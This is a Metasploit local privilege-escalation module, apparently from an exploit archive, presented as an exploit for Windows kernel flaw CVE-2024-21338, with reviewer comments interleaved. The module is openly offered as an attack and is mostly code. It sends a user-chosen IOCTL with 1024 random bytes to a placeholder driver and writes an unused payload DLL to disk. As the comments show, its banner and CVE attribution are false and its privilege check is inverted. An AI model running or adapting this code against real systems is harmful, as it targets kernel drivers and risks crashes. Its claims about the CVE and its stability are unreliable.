# =============================================================================================================================================
# | # Title : Windows 10.0.17763.5458 Kernel IOCTL Access Control Vulnerability Exploit |
# | # Author : indoushka |
# | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
# | # Vendor : https://wordpress.org/plugins/ |
# =============================================================================================================================================
#
# Review note: the "Tested on" entry names a web browser and "Vendor" points at the
# WordPress plugin directory; neither relates to a Windows kernel driver module. The
# banner appears to have been carried over from an unrelated template, so it should not
# be relied on as provenance for the code below.
#
# POC :
#
# [+] References : https://packetstorm.news/files/id/177869/ & CVE-2024-21338
#
# [+] Summary : Windows Kernel IOCTL Insufficient Access Control Vulnerability CVE-2024-21338', 'Description' => %q{ This module exploits an insufficient access control vulnerability in the Windows Kernel through exposed IOCTL handlers. The vulnerability allows non-privileged users to access kernel-level functionality leading to privilege escalation.
#
# [+] POC :
#
# #############################################
# # Exploit Title: Windows 10.0.17763.5458 Kernel IOCTL Access Control Vulnerability Exploit CVE-2024-21338
# # Author: indoushka
# #############################################

# Review note: no longer required by the framework's module loader; harmless but
# flagged by the framework's own lint tooling as redundant.
require 'msf/core'

# Metasploit local exploit module.
#
# Review note: despite the CVE-2024-21338 name and references, nothing in this module is
# specific to that CVE. The device name defaults to the placeholder
# '\\.\VulnerableDriver', the IOCTL code is an ordinary user option, and the request body
# sent to the driver is random alphabetic data (see #trigger_exploit). The generated DLL
# is written to disk but never referenced again. Read this as a generic
# "CreateFile + DeviceIoControl" skeleton rather than a working exploit, and do not treat
# it as evidence of which driver or IOCTL the referenced CVE actually concerns.
class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process

  # Module metadata and user options.
  #
  # @param info [Hash] framework-supplied module info, merged via update_info.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Kernel IOCTL Insufficient Access Control Vulnerability CVE-2024-21338',
        'Description' => %q{
          This module exploits an insufficient access control vulnerability in the Windows Kernel
          through exposed IOCTL handlers. The vulnerability allows non-privileged users to access
          kernel-level functionality leading to privilege escalation.
        },
        'Author' => ['indoushka'],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2024-21338'],
          ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21338'],
          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2024-21338']
        ],
        'Platform' => 'win',
        'Arch' => [ARCH_X64],
        'SessionTypes' => ['meterpreter'],
        'Payload' => { 'Space' => 4096, 'DisableNops' => true },
        'Targets' => [
          [ 'Windows 10/11 x64', { 'Arch' => ARCH_X64, 'Platform' => 'win' } ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => { 'EXITFUNC' => 'thread' },
        'DisclosureDate' => '2024-01-09',
        # Review note: CRASH_SAFE is asserted, but #trigger_exploit hands 1024 random bytes
        # to a kernel IOCTL handler with no structure or size validation on this side.
        # Nothing in the module supports that stability rating; a reviewer would expect
        # CRASH_OS_DOWN or at least a justification here.
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [ARTIFACTS_ON_DISK]
        }
      )
    )

    # DEVICE_NAME defaults to a placeholder rather than a real device path, and IOCTL_CODE
    # is supplied by the operator; the module carries no CVE-specific knowledge of either.
    register_options([
      OptString.new('DEVICE_NAME', [true, 'Vulnerable device name', '\\\\.\\VulnerableDriver']),
      OptInt.new('IOCTL_CODE', [true, 'Vulnerable IOCTL code', 0x222003])
    ])
  end

  # Pre-flight check driven by the session's sysinfo and by whether DEVICE_NAME can be opened.
  #
  # Review note: the privilege branch is inverted for a privilege-escalation module. It
  # returns Detected (not Appears) when the session is NOT already SYSTEM, and #exploit only
  # proceeds when this method returns Appears, so the module will only "run" from a session
  # that already holds SYSTEM — i.e. where there is nothing left to escalate. The message
  # text confirms the author's intent was a SYSTEM requirement, which is the wrong
  # precondition for the Description's stated goal.
  #
  # @return [Msf::Exploit::CheckCode] Safe, Detected or Appears with a short reason.
  def check
    # Check if we're on a vulnerable system
    if sysinfo['OS'] !~ /windows/i
      return CheckCode::Safe('Target is not a Windows system')
    end

    # Check architecture
    if sysinfo['Architecture'] !~ /x64/
      return CheckCode::Safe('Target architecture is not supported')
    end

    # Check if we have necessary privileges
    # (see the method-level review note: this gate is the opposite of what an LPE needs)
    unless is_system?
      return CheckCode::Detected('User does not have SYSTEM privileges')
    end

    # Verify vulnerable driver exists
    # "Exists" here only means CreateFileA on the path succeeded; it says nothing about the
    # driver's identity or version.
    device_path = datastore['DEVICE_NAME']
    if device_exists?(device_path)
      return CheckCode::Appears('Vulnerable device driver detected')
    else
      return CheckCode::Safe('Vulnerable device driver not found')
    end
  end

  # Main entry point: re-runs #check, drops a payload DLL into %TEMP%, then calls
  # #trigger_exploit.
  #
  # Review note: the DLL written here is passed to #trigger_exploit as payload_path but is
  # never read, loaded or referenced there, so the only effect of this step is the on-disk
  # artifact declared in the Notes. The reason string carried by the CheckCode returned
  # from #check is also discarded; only "Target is not vulnerable" reaches the operator.
  #
  # @raise [Msf::Exploit::Failed] via fail_with when the check fails or the IOCTL call fails.
  def exploit
    print_status("Starting exploitation for CVE-2024-21338")

    # Check target environment
    # NOTE(review): compares against the bare CheckCode::Appears (no message); this relies on
    # CheckCode equality ignoring the message text — confirm against the framework version.
    unless check == CheckCode::Appears
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
    end

    # Generate payload
    print_status("Generating payload...")
    payload_data = generate_payload_dll

    # Create temporary file for payload
    temp_path = "#{get_env('TEMP')}\\#{Rex::Text.rand_text_alpha(8)}.dll"
    print_status("Writing payload to #{temp_path}")
    write_file(temp_path, payload_data)
    register_file_for_cleanup(temp_path)

    # Execute exploitation
    print_status("Triggering vulnerability via IOCTL...")
    if trigger_exploit(temp_path)
      print_good("Exploitation successful!")
    else
      fail_with(Failure::Unknown, "Exploitation failed")
    end
  end

  private

  # Attempts to open device_path read-only through railgun's kernel32.CreateFileA and
  # closes the handle again if it succeeded.
  #
  # Review note: the bare rescue catches every StandardError (including railgun/transport
  # errors) and reports false, so a failed lookup is indistinguishable from a genuinely
  # absent device. The rescue also swallows the error message, leaving nothing to diagnose.
  #
  # @param device_path [String] Win32 device path, e.g. the DEVICE_NAME option.
  # @return [Boolean] true only if CreateFileA returned something other than INVALID_HANDLE_VALUE.
  def device_exists?(device_path)
    begin
      file = client.railgun.kernel32.CreateFileA(
        device_path,
        'GENERIC_READ',
        'FILE_SHARE_READ|FILE_SHARE_WRITE',
        nil,
        'OPEN_EXISTING',
        'FILE_ATTRIBUTE_NORMAL',
        0
      )
      if file['return'] != client.railgun.const('INVALID_HANDLE_VALUE')
        client.railgun.kernel32.CloseHandle(file['return'])
        return true
      end
    rescue
      return false
    end
    false
  end

  # Opens DEVICE_NAME read/write and issues a single DeviceIoControl with IOCTL_CODE and a
  # 1024-byte random alphabetic input buffer.
  #
  # Review note: payload_path is accepted but never used, so the DLL dropped by #exploit
  # plays no part in this call. The input buffer is random filler, not a crafted request
  # structure, which is why this method cannot be specific to any particular driver bug.
  # The access-mask string 'GENERIC_READ | GENERIC_WRITE' carries spaces around '|' while
  # #device_exists? uses 'FILE_SHARE_READ|FILE_SHARE_WRITE' without — inconsistent; confirm
  # railgun's constant parser tolerates the spaced form.
  #
  # @param payload_path [String] unused.
  # @return [Boolean] true if DeviceIoControl reported success, false on any failure or error.
  def trigger_exploit(payload_path)
    begin
      # Open device handle
      device_handle = client.railgun.kernel32.CreateFileA(
        datastore['DEVICE_NAME'],
        'GENERIC_READ | GENERIC_WRITE',
        0,
        nil,
        'OPEN_EXISTING',
        0,
        0
      )
      if device_handle['return'] == client.railgun.const('INVALID_HANDLE_VALUE')
        print_error("Failed to open device handle")
        return false
      end

      # Prepare buffer for exploitation
      # 1024 random letters; no structure is imposed on the data.
      buffer_size = 1024
      input_buffer = Rex::Text.rand_text_alpha(buffer_size)

      # Send vulnerable IOCTL
      # Arguments follow kernel32 DeviceIoControl order: handle, control code, input buffer and
      # its size, no output buffer (nil, 0), lpBytesReturned, lpOverlapped. The literal 4 for
      # lpBytesReturned presumably follows railgun's out-parameter convention (size of the
      # buffer railgun allocates for the returned DWORD) — confirm.
      ioctl_result = client.railgun.kernel32.DeviceIoControl(
        device_handle['return'],
        datastore['IOCTL_CODE'],
        input_buffer,
        input_buffer.length,
        nil,
        0,
        4,
        nil
      )

      # Cleanup
      # The handle is closed on the normal path only; an exception between CreateFileA and
      # here leaks it for the lifetime of the session process.
      client.railgun.kernel32.CloseHandle(device_handle['return'])

      # 'return' is the BOOL from DeviceIoControl; a true value here means the driver accepted
      # the request, not that any privilege change occurred.
      if ioctl_result['return']
        print_good("IOCTL sent successfully")
        return true
      else
        print_error("IOCTL failed")
        return false
      end
    rescue => e
      print_error("Exploitation error: #{e.message}")
      return false
    end
  end
end

# Greetings to :=====================================================================================
# jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
# ===================================================================================================